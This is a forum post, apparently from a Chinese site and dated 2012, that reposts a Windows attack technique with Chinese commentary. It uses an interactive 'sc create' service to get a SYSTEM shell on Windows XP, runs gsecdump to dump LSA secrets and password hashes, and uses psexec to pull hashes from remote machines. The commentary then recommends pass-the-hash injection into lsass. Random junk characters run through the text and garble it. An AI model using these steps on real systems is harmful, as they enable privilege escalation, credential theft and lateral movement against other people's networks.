o get a DOS Prompt as NT system:
: t; j, ^0 O+ n8 \% z. h2 E3 o! Z' F& P3 O! Q% N
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
. ^% A' O# i' f[SC] CreateService SUCCESS
$ p+ X" o# Z, \# G( d9 z% {- h1 c
$ D: Y7 B; f+ ]) X8 \! N0 P5 P" e- @C:\>sc start shellcmdline
4 I) V9 x5 }: Q0 R4 N$ C[SC] StartService FAILED 1053:$ w0 w. h3 p# w4 T. B
5 R3 |. y. O. o, z, x5 T0 v0 p5 t
The service did not respond to the start or control request in a timely fashion.% \5 j1 G7 g, W
; [8 W( @6 l/ F" }; y5 Z* qC:\>sc delete shellcmdline w% Y5 ^: j: y) @
[SC] DeleteService SUCCESS& b. x9 S' O" V! K! i. Q" M: s
2 ?7 }5 F! J6 _: w) J& O
------------
% H" q) W/ X# R! ?; q& ~* L' Y8 [3 `0 }
Then in the new DOS window:
% q4 X/ ]3 ?' n' [$ @& O& m' v: D5 S. x+ |" _% m" i
Microsoft Windows XP [Version 5.1.2600]% v* i6 E* M/ y/ O& V! n
(C) Copyright 1985-2001 Microsoft Corp.
6 x3 R. D* B% F( U% B3 C* l( g$ c, w7 Y, L4 s9 L3 b- ~
C:\WINDOWS\system32>whoami: ]4 t2 l. Y' h2 R l
NT AUTHORITY\SYSTEM
! G9 i' a+ x! d& j
$ w/ R: G3 d ]C:\WINDOWS\system32>gsecdump -h2 f3 y. L( t5 X5 G3 R: H
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
1 S! W/ p' Z! Z fusage: gsecdump [options]
- W6 |+ O: a3 u/ R I# t' A& M9 c) F0 W& Q1 b
options:: U+ L: `; s* D: I9 F
-h [ --help ] show help
4 H* s1 p5 v! v# o. a! S-a [ --dump_all ] dump all secrets
- C/ M& T6 @5 V+ k, K# ^-l [ --dump_lsa ] dump lsa secrets% R3 b# t2 f- y6 m c) \5 l
-w [ --dump_wireless ] dump microsoft wireless connections8 p! H2 f' ?9 i9 @
-u [ --dump_usedhashes ] dump hashes from active logon sessions
8 Q i3 a% v: a-s [ --dump_hashes ] dump hashes from SAM/AD
5 e; Q$ z! I/ b! W' \0 w/ c8 \/ Z8 i9 J" S/ G
Although I like to use:% \; G! m% u( K- m+ b( t
6 z7 G( X U! n& C2 k; O" \0 J6 j
PsExec v1.83 - Execute processes remotely
3 w1 M' r6 P( o" rCopyright (C) 2001-2007 Mark Russinovich6 [. s2 h/ _) s v6 b
Sysinternals - 链接标记[url]www.sysinternals.com[/url]: L! e+ ~0 N1 k
, r' U& X6 a$ I7 S/ V. O( }/ P/ y8 nC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
' H! d; u' I2 Q" P5 z/ S# e/ U" a( R$ @$ L) Q% x
to get the hashes from active logon sessions of a remote system.
& c$ H1 s% n6 _ @6 A
" _8 S5 \! W' t7 mThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
$ E. F, G4 L( n! p! f. @4 @- m/ Y, | f
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
* t. f! F1 @) _4 |7 M, M6 Z* U原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
% Z d, Z+ M( ~' ?( ?2 P
$ m, ?4 e" o9 n- e4 X* o我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
. R7 T8 a7 w3 V+ q |
发表于 2012-11-6 21:09:29
收藏
支持
反对